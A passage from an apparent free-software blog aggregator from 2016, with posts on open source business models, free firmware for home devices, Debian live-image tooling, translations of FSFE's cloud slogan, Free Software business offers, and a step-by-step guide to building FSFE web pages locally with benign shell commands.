Recently TTN announced a deal with Farnell, the global distributor of Raspberry Pi, to distribute their products as well. I think KPN and other corporations are jealously looking at what TTN has accomplished as a grass-roots open source movement and wish they had started this amazing concept.

Become an Open Source Conqueror

After reading about the successes of these six Open Source Conquerors, I hope you feel inspired to at least consider this unconventional approach to making your innovative idea a worldwide success! We can learn a lot by studying these companies, and in case you are still wondering:

“But how do I make money with Open Source?” here is a list of the options you have:

Sell or rent out physical products
Sell products and services made with Open Source products
Sell per-client installations and customizations
Sell the means to use Open Source
Sell education and consultancy
Sell proprietary premium products
Sell the franchise and certification
Organize events and sell tickets
Benefit from ‘open’-oriented subsidies and (research) grants
Start a foundation or consortium

Basically you sell products and services just as any traditional ‘closed’ company does, except that you cannot sell licenses to intellectual property like patents. This list is an adaptation of Lars Zimmerman’s excellent article about the topic.

“Be Fair, do not OpenWash!”

When you are going for Open Source, I recommend that you do it properly and in a fair way. Do not market and promote something as “Open Source” when in fact it is not. Stick to the widely accepted Open Source Software Definition by the Open Source Initiative and the Open Source Hardware Definition by the Open Source Hardware Association.

If you play such tricks, I call this “Openwashing”, and it can and probably will explode in your face later on. A famous example of this is Makerbot, which several years ago was the market leader for desktop 3D Printers. They had a huge community, which helped them out in many ways, and they were developing really innovative printers, completely Open Source. Then somebody decided to take all the ‘source’ (design files, schematics, etc.) and start a Crowdfunding campaign to have clones made in China.

Even though the campaign failed, it scared the Makerbot founders enough to make the unwise decision to take Makerbot proprietary. This caused outrage in the community and destroyed their brand. Combined with bringing several low-quality 3D Printers to the market, the company is now marginalized and could very well cease to exist soon.

“Think Big, Act Small”

One final piece of advice for when you are starting out with an Open Source Strategy: “Think Big, Act Small”. Since you probably have little or no experience with the topic and with how to make a successful Open Source Business Model, start with small experiments and learn along the way.

Look for example at what Texas Instruments and Intel are doing in this regard: big corporations dipping their toes into the waters of Open Source.

If you are wondering about my experience with Open Source Business Models, then check out Totem Open Health, an initiative I started in 2014 which now continues to conquer the world without me.

Thursday, 01 December 2016

Using a fully free OS for devices in the home

DanielPocock.com - fsfe | 13:11, Thursday, 01 December 2016

There are more and more devices around the home (and in many small offices) running a GNU/Linux-based firmware. Consider routers, entry-level NAS appliances, smart phones and home entertainment boxes.

More and more people are coming to realize that there is a lack of security updates for these devices and a big risk that the proprietary parts of the code are either very badly engineered (if you don't plan to release your code, why code it properly?) or deliberately include spyware that calls home to the vendor, ISP or other third parties. IoT botnet incidents, which are becoming more widely publicized, emphasize some of these risks.

On top of this is the frustration of trying to become familiar with numerous different web interfaces (for your own devices and those of any friends and family members you give assistance to) and the fact that many of these devices have very limited feature sets.

Many people hail OpenWRT as an example of a free alternative (for routers), but I recently discovered that OpenWRT's web interface won't let me enable both DHCP and DHCPv6 concurrently. The underlying OS and utilities fully support dual stack, but the UI designers haven't encountered that configuration before. Conclusion: move to a device running a full OS, probably Debian-based, but I would consider BSD-based solutions too.

For many people, the benefit of this strategy is simple: use the same skills across all the different devices, at home and in a professional capacity. Get rapid access to security updates. Install extra packages or enable extra features if really necessary. For example, I already use Shorewall and strongSwan on various Debian boxes and I find it more convenient to configure firewall zones using Shorewall syntax rather than OpenWRT's UI.

Which boxes to start with?

There are various considerations when going down this path:

  • Start with existing hardware, or buy new devices that are easier to re-flash? Sometimes there are other reasons to buy new hardware, for example when upgrading a broadband connection to Gigabit, or when an older NAS gets a noisy fan or struggles with SSD performance; in these cases, the decision about what to buy can be limited to those devices that are optimal for replacing the OS.
  • How will the device be supported? Can other non-technical users do troubleshooting? If mixing and matching components, how will faults be identified? If buying a purpose-built NAS box and the CPU board fails, will the vendor provide next day replacement, or could it be gone for a month? Is it better to use generic components that you can replace yourself?
  • Is a completely silent/fanless solution necessary?
  • Is it possible to completely avoid embedded microcode and firmware?
  • How many other free software developers are using the same box, or will you be first?

Discussing these options

I recently started threads on the debian-user mailing list discussing options for routers and home NAS boxes. A range of interesting suggestions have already appeared; it would be great to see any other ideas that people have about these choices.

Monday, 28 November 2016

Freed-Ora 25 released

Marcus's Blog | 11:13, Monday, 28 November 2016

Freed-Ora is a Libre version of Fedora GNU/Linux which comes with the Linux-libre kernel and the Icecat browser.
The procedure for creating Live media has changed within Fedora, and the image has been built using livemedia-creator instead of livecd-creator. The documentation on how to build the image can be found here.

Please download the Freed-Ora 25 ISO and give feedback.

Friday, 25 November 2016

vmdebootstrap Sprint Report

Iain R. Learmonth | 12:06, Friday, 25 November 2016

This is now a little overdue, but here it is. On the 10th and 11th of November, the second vmdebootstrap sprint took place. Lars Wirzenius (liw), Ana Custura (ana_c) and I were present. liw focussed on the core of vmdebootstrap, where he sketched out what the future of vmdebootstrap may look like. He documented this in a mailing list post and also presented it (video).

Ana and I worked on live-wrapper, which uses vmdebootstrap internally for the squashfs generation. I worked on improving logging, using a better method for getting paths within the image, enabling generation of Packages and Release files for the image archive, and also made the images installable (live-wrapper 0.5 onwards will include an installer by default).

Ana worked on the inclusion of HDT and memtest86+ in the live images and enabled both ISOLINUX (for BIOS boot) and GRUB (for EFI boot) to boot the text-mode and graphical installers.

live-wrapper 0.5 was released on the 16th November with these fixes included. You can find live-wrapper documentation at https://live-wrapper.readthedocs.io/en/latest/. (The documentation still needs some work; some options may be incorrectly described.)

Thanks to the sponsors that made this work possible. You’re awesome. (:

Monday, 21 November 2016

21 November 1916

DanielPocock.com - fsfe | 18:31, Monday, 21 November 2016

There has been a lot of news recently about the 100th anniversaries of various events that took place during the Great War.

On 21 November 1916, the SS Hunscraft sailed from Southampton to France. My great grandfather, Robert Pocock, was aboard.

He was part of the Australian Imperial Force, 3rd Divisional Train.

It's sad that Australians had to travel halfway around the world to break up fist fights and tank battles. Sadder still that some people who romanticize the mistakes of imperialism are being appointed to significant positions of power.

Fortunately my great grandfather returned to Australia in one piece; many Australians didn't.

Robert Pocock's war medals

Sunday, 20 November 2016

On Not Liking Computers

Paul Boddie's Free Software-related blog » English | 23:57, Sunday, 20 November 2016

Adam Williamson recently wrote about how he no longer really likes computers. This attracted many responses from people who misunderstood him and decided to dispense career advice, including doses of the usual material about “following one’s passion” or “changing one’s direction” (which usually involves becoming some kind of “global nomad”), which do make me wonder how some of these people actually pay their bills. Do they have a wealthy spouse or wealthy parents or “an inheritance”, or do they just do lucrative contracting for random entities whose nature or identities remain deliberately obscure to avoid thinking about where the money for those jobs really comes from? Particularly the latter would be the “global nomad” way, as far as I can tell.

But anyway, Adam appears to like his job: it’s just that he isn’t interested in technological pursuits outside working hours. At some level, I think we can all sympathise with that. For those of us who have similarly pessimistic views about computing, it’s worth presenting a list of reasons why we might not be so enthusiastic about technology any more, particularly for those of us who also care about the ethical dimensions, not merely whether the technology itself is “any good” or whether it provides a sufficient intellectual challenge. By the way, this is my own list: I don’t know Adam from, well, Adam!

Lack of Actual Progress

One may be getting older and noticing that the same technological problems keep occurring again and again, never getting resolved, while seeing people with no sense of history provoke change for change’s – not progress’s – sake. After a while, or when one gets to a certain age, one expects technology to just work and that people might have figured out how to get things to communicate with each other, or whatever, by building on what went before. But then it usually seems to be the case that some boy genius or other wanted a clear run at solving such problems from scratch, developing lots of flashy features but not the mundane reliability that everybody really wanted.

People then get told that such “advanced” technology is necessarily complicated. Whereas once upon a time, you could pick up a telephone, dial a number, have someone answer, and conduct a half-decent conversation, now you have to make sure that the equipment is all connected up properly, that all the configurations are correct, that the Internet provider isn’t short-changing you or trying to suppress your network traffic. And then you might dial and not get through, or you might have the call mysteriously cut out, or the audio quality might be like interviewing a gang of squabbling squirrels speaking from the bottom of a dustbin/trashcan.

Depreciating Qualifications

One may be seeing a profession that requires a fair amount of educational investment – which, thanks to inept/corrupt politicians, also means a fair amount of financial investment – become devalued to the point that its practitioners are regarded as interchangeable commodities who can be coerced into working for as little as possible. So much for the “knowledge economy” when its practitioners risk ending up earning less than people doing so-called “menial” work who didn’t need to go through a thorough higher education or keep up an ongoing process of self-improvement to remain “relevant”. (Not that there’s anything wrong with “menial” work: without people doing unfashionable jobs, everything would grind to a halt very quickly, whereas quite a few things I’ve done might as well not exist, so little difference they made to anything.)

Now we get told that programming really will be the domain of “artificial intelligence” this time around. That instead of humans writing code, “high priests” will merely direct computers to write the software they need. Of course, such stuff sounds great in Wired magazine and rather amusing to anyone with any actual experience of software projects. Unfortunately, politicians (and other “thought leaders”) read such things one day and then slash away at budgets the next. And in a decade’s time, we’ll be suffering the same “debate” about a lack of “engineering talent” with the same “insights” from the usual gaggle of patent lobbyists and vested interests.

Neoliberal Fantasy Economics

One may have encountered the “internship” culture where as many people as possible try to get programmers and others in the industry to work for nothing, making them feel as if they need to do so in order to prove their worth for a hypothetical employment position or to demonstrate that they are truly committed to some corporate-aligned goal. One reads or hears people advocating involvement in “open source” not to uphold the four freedoms (to use, share, modify and distribute software), but instead to persuade others to “get on the radar” of an employer whose code has been licensed as Free Software (or something pretending to be so) largely to get people to work for them for free.

Now, I do like the idea of employers getting to know potential employees by interacting in a Free Software project, but it should really only occur when the potential employee is already doing something they want to do because it interests them and is in their interests. And no-one should be persuaded into doing work for free on the vague understanding that they might get hired for doing so.

The Expendable Volunteers

One may have seen the exploitation of volunteer effort where people are made to feel that they should “step up” for the benefit of something they believe in, often requiring volunteers to sacrifice their own time and money to do such free work, and often seeing those volunteers being encouraged to give money directly to the cause, as if all their other efforts were not substantial contributions in themselves. While striving to make a difference around the edges of their own lives, volunteers are often working in opposition to well-resourced organisations whose employees have the luxury of countering such volunteer efforts on a full-time basis and with a nice salary. Those people can go home in the evenings and at weekends and tune it all out if they want to.

No wonder volunteers burn out or decide that they just don’t have time or aren’t sufficiently motivated any more. The sad thing is that some organisations ignore this phenomenon because there are plenty of new volunteers wanting to “get active” and “be visible”, perhaps as a way of marketing themselves. Then again, some communities are content to alienate existing users if they can instead attract the mythical “10x” influx of new users to take their place, so we shouldn’t really be surprised, I suppose.

Blame the Powerless

One may be exposed to the culture that if you care about injustices or wrongs then bad or unfortunate situations are your responsibility even if you had nothing to do with their creation. This culture pervades society and allows the powerful to do what they like, to then make everyone else feel bad about the consequences, and to virtually force people to just accept the results if they don’t have the energy at the end of a busy day to do the legwork of bringing people to account.

So, those of us with any kind of conscience at all might already be supporting people trying to do the right thing like helping others, holding people to account, protecting the vulnerable, and so on. But at the same time, we aren’t short of people – particularly in the media and in politics – telling us how bad things are, with an air of expectation that we might take responsibility for something supposedly done on our behalf that has had grave consequences. (The invasion and bombing of foreign lands is one depressingly recurring example.) Sadly, the feeling of powerlessness many people have, as the powerful go round doing what they like regardless, is exploited by the usual cynical “divide and rule” tactics of other powerful people who merely see the opportunities in the misuse of power and the misery it causes. And so, selfishness and tribalism proliferate, demotivating anyone wanting the world to become a better place.

Reversal of Liberties

One may have had the realisation that technology is no longer merely about creating opportunities or making things easier, but is increasingly about controlling and monitoring people and making things complicated and difficult. That sustainability is sacrificed so that companies can cultivate recurring and rich profit opportunities by making people dependent on obsolete products that must be replaced regularly. And that technology exacerbates societal ills rather than helping to eradicate them.

We have the modern Web whose average site wants to “dial out” to a cast of recurring players – tracking sites, content distribution networks (providing advertising more often than not), font resources, image resources, script resources – all of which contribute to making the “signal-to-noise” ratio of the delivered content smaller and smaller all the time. Where everything has to maintain a channel of communication to random servers to constantly update them about what the user is doing, where they spent most of their time, what they looked at and what they clicked on. All of this requiring hundreds of megabytes of program code and data, burning up CPU time, wasting energy, making computers slow and steadily obsolete, forcing people to throw things away and to buy more things to throw away soon enough.

We have the “app” ecosystem experience, with restrictions on access, competition and interoperability, with arbitrarily-curated content: the walled gardens that the likes of Apple and Microsoft failed to impose on everybody at the dawn of the “consumer Internet” but do so now under the pretences of convenience and safety. We have social networking empires that serve fake news to each person’s little echo chamber, whipping up bubbles of hate and distracting people from what is really going on in the world and what should really matter. We have “cloud” services that often offer mediocre user experiences but which offer access from “any device”, with users opting in to both the convenience of being able to get their messages or files from their phone and the surveillance built into such services for commercial and governmental exploitation.

We have planned obsolescence designed into software and hardware, with customers obliged to buy new products to keep doing the things they want to do with those products and to keep it a relatively secure experience. And we have dodgy batteries sealed into devices, with the obligation apparently falling on the customers themselves to look after their own safety and – when the product fails – the impact of that product on the environment. By burdening the hapless user of technology with so many caveats that their life becomes dominated by them, those things become a form of tyranny, too.

Finding Meaning

Many people need to find meaning in their work and to feel that their work aligns with their own priorities. Some people might be able to do work that is unchallenging or uninteresting and then pursue their interests and goals in their own time, but this may be discouraging and demotivating over the longer term. When people’s work is not orthogonal to their own beliefs and interests but instead actively undermines them, the result is counterproductive and even damaging to those beliefs and interests and to others who share them.

For example, developing proprietary software or services in a full-time job, although potentially intellectually challenging, is likely to undermine any realistic level of commitment in one’s own free time to Free Software that does the same thing. Some people may prioritise a stimulating job over the things they believe in, feeling that their work still benefits others in a different way. Others may feel that they are betraying Free Software users by making people reliant on proprietary software and causing interoperability problems when those proprietary software users start assuming that everything should revolve around them, their tools, their data, and their expectations.

Although Adam wasn’t framing this shift in perspectives in terms of his job or career, it might have an impact on some people in that regard. I sometimes think of the interactions between my personal priorities and my career. Indeed, the way that Adam can seemingly stash his technological pursuits within the confines of his day job, while leaving the rest of his time for other things, was some kind of vision that I once had for studying and practising computer science. I think he is rather lucky in that his employer’s interests and his own are aligned sufficiently for him to be able to consider his workplace a venue for furthering those interests, doing so sufficiently to not need to try and make up the difference at home.

We live in an era of computational abundance and yet so much of that abundance is applied ineffectively and inappropriately. I wish I had a concise solution to the complicated equation involving technology and its effects on our quality of life, if not for the application of technology in society in general, then at least for individuals, and not least for myself. Maybe a future article needs to consider what we should expect from technology, as its application spreads ever wider, such that the technology we use and experience upholds our rights and expectations as human beings instead of undermining and marginalising them.

It’s not hard to see how even those who were once enthusiastic about computers can end up resenting them and disliking what they have become.

Friday, 18 November 2016

Localizing our noCloud slogan

English Planet – Dreierlei | 15:12, Friday, 18 November 2016

there is noCloud

At FSFE we have been asked many times to come up with translations of our popular “There is no CLOUD, just other people’s computers” slogan. This week we started the localization by asking our translator team, and we were very surprised to see them come up with translations in 16 different languages right away.

In addition, our current trainee Olga Gkotsopoulou asked her international network, and we asked on Twitter for additional translations. And what can I say? Crowdsourcing has seldom felt so appealing. In two hours we got 8 more translations, and after 24 hours we already had 30.

The speed with which we got so many translations shows us that the slogan really strikes a chord. People are happy to translate it because they love to send this message out. At the time of writing we have 36 translations and two dialects on our wiki-page:

[AR] لا يوجد غيم, هناك أخرين كمبيوتر
[BR] N’eus Cloud ebet. Urzhiataerioù tud all nemetken.
[CAT] No hi ha cap núvol, només ordinadors d’altres persones.
[DA] Der findes ingen sky, kun andre menneskers computere.
[DE] Es gibt keine Cloud, nur die Computer anderer Leute.
[EL] Δεν υπάρχει Cloud, μόνο υπολογιστές άλλων.
[EU] Ez dago lainorik, beste pertsona batzuen ordenagailuak baino ez.
[EO] Nubon ne ekzistas sed fremdaj komputiloj.
[ES] La nube no existe, son ordenadores de otras personas.
[ET] Pole mingit pilve, on vaid teiste inimeste arvutid.
[FA] فضای ابری در کار نیست، تنها رایانه های دیگران
[FR] Il n’y a pas de cloud, juste l’ordinateur d’un autre.
[FI] Ei ole pilveä, vain toisten ihmisten tietokoneita.
[GL] A nube non existe, só son ordenadores doutras persoas.
[GA] Níl aon néal ann, níl ann ach ríomhairí daoine eile.
[HE] אין ענן, רק מחשבים של אנשים אחרים
[HY] Չկա ամպ, կա պարզապես այլ մարդկանց համակարգիչներ
[IT] Il cloud non esiste, sono solo i computer di qualcun altro
[JP] クラウドはありません。 他の人のコンピュータだけがあります。
[KA] არ არის საწყობი ,მხოლოდ ბევრი ეტიკეტებია ხალხში სხვადასხვა ენებზე
[KL] Una pujoqanngilaq – qarasaasiat allat kisimik
[KO] 구름은 없다. 다른 사람의 컴퓨터일뿐.
[LB] Et gëtt keng Cloud, just anere Leit hier Computeren.
[NL] De cloud bestaat niet, alleen computers van anderen
[TR] Bulut diye bir şey yok, sadece başkalarının bilgisayarları var.
[TL] walang ulap kundi mga kompyuter ng ibang tao
[PL] Nie ma chmury, są tylko komputery innych.
[PT] Não há nuvem nenhuma, há apenas computadores de outras pessoas.
[RO] Nu există nici un nor, doar calculatoarele altor oameni.
[RS] Ne postoji Cloud, već samo računari drugih ljudi.
[RU] Облака нет, есть чужие компьютеры.
[SQ] S’ka cloud, thjesht kompjutera personash të tjerë.
[SV] Det finns inget moln, bara andra människors datorer.
[UR] کلاوڈ سرور کچھ نہیی، بس کسی اور کاکمپیوٹر۔
[VI] Không có Đám mây, chỉ có những chiếc máy tính của kẻ khác.
[ZH] 没有云,只有人们的电脑.

And again: if your language or dialect is missing, add it to the wiki, leave it as a comment or write me a message and I will add it.

Tuesday, 15 November 2016

There is no Free Software company - But!

Matthias Kirschner's Web log - fsfe | 09:22, Tuesday, 15 November 2016

Since the start of the FSFE 15 years ago, the people involved have been certain that companies are a crucial part of reaching our goal of software freedom. For many years we have explained to companies – IT as well as non-IT – what benefits they get from Free Software. We encourage individuals and companies to pay for Free Software, just as we encourage companies to use Free Software in their offers.

A factory building

While more people demanded Free Software, we also saw more companies claiming something is Free Software or Open Source Software although it is not. This behaviour – also called "openwashing" – is not specific to Free Software; some companies also claim something is "organic" or "fair-trade" although it is not. As the attempts to get a trademark for "Open Source" failed, it is difficult to legally prevent companies from calling something "Free Software" or "Open Source Software" even though it complies with neither the Free Software definition by the Free Software Foundation nor the Open Source definition by the Open Source Initiative.

When the FSFE was founded in 2001 there was already the idea to encourage and support companies making money with Free Software by starting a "GNU business network". One of the stumbling blocks for that was always the definition of a Free Software company. It cannot just be about the usage of Free Software or the contribution to Free Software, but also needs to include what rights the company offers its customers. Another factor was whether the revenue stream is tied to proprietary licensing conditions. Would we also allow a small revenue from proprietary software, and how high could that be before you could no longer consider it a Free Software company?

It turned out to be a very complicated issue, and although we were regularly discussing it we did not have an idea how to approach the problems in defining a Free Software company.

During our last meeting of the FSFE's General Assembly – triggered by our new member Mirko Böhm – we came to the conclusion that there was a flaw in our thinking and that it does not make sense to think about "Free Software companies". In hindsight it might look obvious, but for me the discussion was an eye opener, and I have the feeling that was a huge step for software freedom.

As a side note: When we have the official general assembly of the FSFE we always use this opportunity to have more discussions during the days before or after. Sometimes they focus on internal topics, organisational changes, but often there is brainstorming about the "hot topics of software freedom" and where the FSFE has to engage in the long run. At this year's meeting, from 7 to 9 October, inspired by Georg Greve's and Nicolas Dietrich's input, we spent the whole Saturday thinking about the long term challenges for software freedom with the focus on the private sector.

We talked about the challenges of software freedom presented by economies of scale, networking effects, investment preference, and users making convenience and price based decisions over values – even when they declare themselves value conscious.

One problem preventing a wider spread of software freedom identified there was that Free Software is being undermined by companies that abuse the positive brand recognition of Free Software / Open Source by "openwashing" themselves. Sometimes they offer products that do not even have a Free Software version. This penalises companies and groups that aim to work within the principles of Free Software and damages the recognition of Free Software / Open Source in the market. The consequence is reduced confidence in Free Software, fewer developers working on it, fewer companies providing it, and less Free Software being written in favour of proprietary models.

In the discussion, one question kept arising. Is an activity that is good for Free Software more valuable when it is done by one small company as its sole activity than when the same thing is done as part of a larger enterprise? We all agree that a small company which uses and distributes exclusively Free Software, has done so for many years, and has never written or included any non-free software, is doing good. But what happens if said small, focused company is purchased by a larger entity? Does that invalidate the benefit of what is being done?

We concluded that a good action remains a good action, and that the FSFE should encourage good actions. So instead of focusing on the company as such, we should focus on the activity itself; we should think about "Free Software business activities", "Free Software business offers", and so on. My feeling was that this was the moment the penny dropped, as others and I realised the flaw in our previous thinking. We need action-oriented approaches and we need to look at activities individually.

There was still the question of where to draw the line between acceptable or useful activities and harmful ones. This is not a black and white issue, and when assessing the impact on software freedom there are different levels. For example, if you evaluate a sharing platform, you might find out that the core is Free Software, but the sharing module itself is proprietary. This is a bad offer if you want to run a competing sharing platform using Free Software.

The counter example of an acceptable offer was a collaboration software that was useful and complete, but where connecting a proprietary client would itself require a proprietary connector. It was also discussed that sometimes you need to interface with proprietary systems through proprietary libraries that do not allow connecting with Free Software unless one were to first replace the entire API/library itself.

Ultimately a consensus emerged around a focus on the four freedoms of Free Software in relation to the question of whether the software is sufficiently complete and useful to run a competing business.

One thought was to run "test cases" to evaluate how good an offer is on the Free Software scale: something like a regular bulletin about best and worst practice. We could look at a business activity, study it according to the criteria below, evaluate it, and make that evaluation and its conclusions public. That way we can help to build customer awareness about software freedom. Here is a first idea for a scale:

  • EXCELLENT: Free Software only and on all levels, no exceptions.

  • GOOD: Free Software as a complete, useful, and fully supportable product. Support available for Free Software version.

  • ACCEPTABLE: Proprietary interfaces to proprietary systems and applications, especially complex systems that require complex APIs/libraries/SDKs, as long as the above is still met.

  • BAD: Essential / important functionality only available in the proprietary version, critical functionality missing from the Free Software one (one example of an essential functionality was an LDAP connector).

  • REALLY BAD: Fully proprietary, but claiming to be Free Software / Open Source Software.

Now I would like to know from you: what is your first reaction to this? Would you like to add something? Do you have ideas about what should be included in a checklist for such a test? Would you be interested in helping us evaluate how good some offers are on such a scale?

To summarise, I believe it was a mistake to think about businesses as a whole, and that if we want to take the next big steps we should think about Free Software business offers / activities – at least until we have a better name for what I described above. We should help companies not to be deluded by people merely claiming something is Free Software, and give them the tools to check for themselves.

PS: Thank you very much to the participants at the FSFE meeting, especially Georg Greve for pushing this topic and internally summarising our discussion, and Mirko Böhm, whose contribution was the trigger in the discussion for realising our previous flaw in thinking.

Sunday, 13 November 2016

Build FSFE websites locally

English – Max's weblog | 23:00, Sunday, 13 November 2016

Note: This guide is also available in FSFE’s wiki now, and it will be the only version maintained. So please head over to the wiki if you’re planning to follow this guide.

Those who create, edit, and translate FSFE websites already know that the source files are XHTML files which are built with an XSLT processor, including a lot of custom stuff. One of the huge advantages of that is that we don’t have to rely on dynamic website processors and databases; on the other hand there are a few drawbacks as well: websites need a few minutes to be generated by the central build system, and it’s quite easy to mess up the XML syntax. So if an editor wants to create or edit a page, she needs to wait a few minutes until the build system has finished every time she wants to test how the website looks. In this guide I will show how to build single websites on your own computer in a fraction of the FSFE system’s build time, so that you only need to commit your changes once the file looks the way you want. All you need is a bit of hard disk space and around one hour to set everything up.

The whole idea is based on what FSFE’s webmaster Paul Hänsch has coded and written. On his blog he explains the new build script. He explains how to build files locally, too. However, this guide aims to make it a bit easier and more verbose.

Before we get started, let me briefly explain the concept of what we’ll be doing. Basically, we’ll have three directories: trunk, status, and fsfe.org. Most likely you already have trunk; it’s a checkout of the FSFE’s main SVN repository, and the source of all operations. All the files in there have to be compiled to generate the final HTML files we can browse. The location of these finished files will be fsfe.org. status, the third directory, contains error messages and temporary files.

After we (1) create these directories, partly by downloading a repository with some useful scripts and configuration files, we’ll (2) build the whole FSFE website on our own computer. In the next step, we’ll (3) set up a local webserver so you can actually browse these files. And lastly we’ll (4) set up a small script which you can use to quickly build single XHTML files. Last but not least I’ll give some real-world examples.

1. Clone helper repository

Firstly, clone a git repository which will give you most of the files and directories needed for the further steps. I created it; it contains configuration files and the script that will make building single files easier. Of course, you can also do everything manually.

In general, this is the directory structure I propose. In the following I’ll stick to this scheme. Please adapt all paths accordingly if your folder tree looks different.

trunk (~700 MB):      ~/subversion/fsfe/fsfe-web/trunk/
status (~150 MB):     ~/subversion/fsfe/local-build/status/
fsfe.org (~1000 MB):  ~/subversion/fsfe/local-build/fsfe.org/

(For those not so familiar with the GNU/Linux terminal: ~ is the short version of your home directory, so for example /home/user. ~/subversion is the same as /home/USER/subversion, given that your username is USER)

To continue, you have to have git installed on your computer (sudo apt-get install git). Then, please execute the following command in a terminal. It will copy the files from my git repository to your computer and already contains the folders status and fsfe.org.

git clone https://src.mehl.mx/mxmehl/fsfe-local-build.git ~/subversion/fsfe/local-build

Now we take care of trunk. In case you already have a copy of trunk on your computer, you can use this location, but please do a svn up beforehand and be sure that the output of svn status is empty (so no new or modified files on your side). If you don’t have trunk yet, download the repository to the proposed location:

svn --username $YourFSFEUsername co https://svn.fsfe.org/fsfe-web/trunk ~/subversion/fsfe/fsfe-web/trunk
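
If, on the other hand, you are reusing an existing working copy, the pre-flight check mentioned above boils down to something like this (the svn status call should print nothing):

cd ~/subversion/fsfe/fsfe-web/trunk
svn up
svn status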

2. Build full website

Now we have to build the whole FSFE website locally. This will take a longer time but we’ll only have to do it once. Later, you’ll just build single files and not >14000 as we do now.

But first, we have to install a few applications which are needed by the build script (Warning: it’s possible your system lacks some other required applications which were already installed on mine. If you encounter any command not found errors, please report them in the comments or by mail). So let’s install them via the terminal:

sudo apt-get install make libxslt

Note: libxslt may have a different name in your distribution, e.g. libxslt1.1 or libxslt2; on Debian-based systems the command-line XSLT processor that comes with libxslt is packaged separately as xsltproc.

Now we can start building. The full website build can be started with

~/subversion/fsfe/fsfe-web/trunk/build/build_main.sh --statusdir ~/subversion/fsfe/local-build/status/ build_into ~/subversion/fsfe/local-build/fsfe.org/

See? We use the build routine from trunk to launch the build of trunk. All status messages are written to status, and the final website will reside in fsfe.org. Mind the differing directory names if your structure is not the same as mine. This process will take a long time, depending on your CPU power. Don’t be afraid of strange messages and massive walls of text ;-)

After the long process has finished, navigate to the trunk directory and execute svn status. You may see a few files which are new:

max@bistromath ~/s/f/f/trunk> svn status
?       about/printable/archive/printable.en.xml
?       d_day.en.xml
?       d_month.en.xml
?       d_year.en.xml
?       localmenuinfo.en.xml
[...]

These are leftovers from the full website build. Because trunk is supposed to be your productive source directory where you also make commits to the FSFE SVN, let’s delete these files. You won’t need them anymore.

rm about/printable/archive/printable.en.xml d_day.en.xml d_month.en.xml d_year.en.xml localmenuinfo.en.xml
rm tools/tagmaps/*.map

Afterwards, the output of svn status should be empty again. It is? Fine, let’s go on! If not, please also remove those files (and tell me which files were missing).

3. Set up local webserver

After the full build is completed, you can install a local webserver. This is necessary to actually display the locally built files in your browser. In this example, I assume you don’t already have a webserver installed, and that you’re using a Debian-based operating system. So let’s install lighttpd which is a thin and fast webserver, plus gamin which lighttpd needs in some setups:

sudo apt-get install lighttpd gamin

To make lighttpd run properly we need a configuration file. It has to point the webserver to the files in the fsfe.org directory. You already downloaded my recommended config file (lighttpd-fsfe.conf.sample) by cloning the git repository, but you’ll have to rename it and modify the path accordingly. So rename the file to lighttpd-fsfe.conf, open it, and change the following line to match the actual, absolute path of the fsfe.org directory (~ does not work here):

server.document-root = "/home/USER/subversion/fsfe/local-build/fsfe.org"

Now you can test whether the webserver is correctly configured. To start a temporary webserver process, execute the next command in the terminal:

lighttpd -Df ~/subversion/fsfe/local-build/lighttpd-fsfe.conf

Until you press Ctrl+C, you should be able to open your local FSFE website in any browser using the URL http://localhost:5080. For example, open the URL http://localhost:5080/contribute/contribute.en.html in your browser. You should see basically the same website as the original fsfe.org website. If not, double-check the paths, whether the lighttpd process is still running, and whether the full website build has actually finished.

4. Single page build script

Until now, you haven’t seen much more than you can see on the original website. But in this step, we’ll configure and start using a Bash script (fsfe-preview.sh) I’ve written to make previewing a locally edited XHTML file as comfortable as possible. You already downloaded it by cloning the repository.

First, rename and edit the script’s configuration file config.cfg.sample: rename it to config.cfg and open it. The file contains all the paths we already used here, so please adapt them to your structure if necessary. Normally, it should be sufficient to modify the values for LOC_trunk (trunk directory) and LOC_out (fsfe.org directory); the rest can be left at the default values.
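
With the directory layout proposed above, and assuming config.cfg uses plain shell-style assignments (check config.cfg.sample for the exact syntax), the two relevant lines would end up looking roughly like this:

LOC_trunk="/home/USER/subversion/fsfe/fsfe-web/trunk"
LOC_out="/home/USER/subversion/fsfe/local-build/fsfe.org"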

Another feature of fsfe-preview is that it automatically checks the XML syntax of the files. For this, libxml2-utils, which contains xmllint, has to be installed. Please execute:

sudo apt-get install libxml2-utils

Now let’s make the script easy to access via the terminal for future usage. For this, we’ll create a symbolic link to the script in one of the binary path directories. Type in the terminal:

sudo ln -s ~/subversion/fsfe/local-build/fsfe-preview.sh /usr/bin/fsfe-preview

From this moment on, you should be able to call fsfe-preview from anywhere in your terminal. Let’s make a test run. Modify the XHTML source file contribute/contribute.en.xhtml and edit some obvious text or alter the title. Now do:

fsfe-preview ~/subversion/fsfe/fsfe-web/trunk/contribute/contribute.en.xhtml

As output, you should see something like:

[INFO] Using file /home/max/subversion/fsfe/fsfe-web/trunk/contribute/contribute.en.xhtml as source...
[INFO] XHTML file detected. Going to build into /home/max/subversion/fsfe/local-build/fsfe.org/contribute/contribute.en.html ...
[INFO] Starting webserver

[SUCCESS] Finished. File can be viewed at http://localhost:5080/contribute/contribute.en.html

Now open the mentioned URL http://localhost:5080/contribute/contribute.en.html and take a look whether your changes had an effect.

Recommended workflows

In this section I’ll present a few of the cases you might face and how to solve them with the script. I presume you have your terminal opened in the trunk directory.

Preview a single file

To preview a single file before uploading it, just edit it locally. The file has to be located in the trunk directory, so I suggest using only one SVN trunk on your computer; it makes almost no sense to store your edited files in different folders. To preview the file, just give the path to it as an argument to fsfe-preview, just as we did in the preceding step:

fsfe-preview activities/radiodirective/statement.en.xhtml

The script detects whether the file has to be built with the XSLT processor (.xhtml files), or whether it can just be copied to the website without any modification (e.g. images).

Copy many files at once

Beware that all files you added in your session have to be processed with the script. For example, if you create a report with many images included and want to preview it, you will have to copy all these images to the output directory as well, and not only the XHTML file. For this, there is the --copy argument. It circumvents the whole XSLT build process and just plainly copies the given files (or folders). In this example, the workflow could look like the following: the first line copies some images, the second builds the corresponding XHTML file which makes use of these images:

fsfe-preview --copy news/2016/graphics/report1.png news/2016/graphics/report2.jpg
fsfe-preview news/2016/news-20161231-01.en.xhtml

Syntax check

In general, it’s good to check the XHTML syntax while editing and before committing files to the SVN. The script fsfe-preview already contains these checks, but it’s good to be able to run them on their own anyway. If you didn’t already do it before, install libxml2-utils on your computer. It contains xmllint, a syntax checker for XML files. You can use it like this:

xmllint --noout work.en.xhtml

If there’s no output (--noout), the file has correct syntax and you’re ready to continue. But you may also see something like

work.en.xhtml:55: parser error : Opening and ending tag mismatch: p line 41 and li
      </li>
           ^

